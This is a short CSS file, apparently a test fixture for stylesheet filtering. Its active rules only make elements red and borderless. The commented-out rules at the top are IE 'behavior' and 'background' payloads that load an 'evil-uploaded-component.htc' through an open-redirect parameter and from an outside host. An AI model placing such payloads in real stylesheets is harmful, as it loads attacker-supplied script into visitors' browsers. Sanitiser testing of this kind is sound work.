/*body > div {*/
    /*background:url(?redirect=/user/uploadedfiles/evil-uploaded-component.htc);*/
    /*behavior:url(?redirect=/user/uploadedfiles/evil-uploaded-component.htc);*/
/*}*/
/*body#root {*/
    /*background:url(http://mossad.com/user/uploadedfiles/evil-uploaded-component.htc);*/
    /*behavior:url(http://mossad.com/user/uploadedfiles/evil-uploaded-component.htc);*/
/*}*/
#appstackInfo {
    color: red;
    border: none;
}
button {
    color: red;
    border: none;
}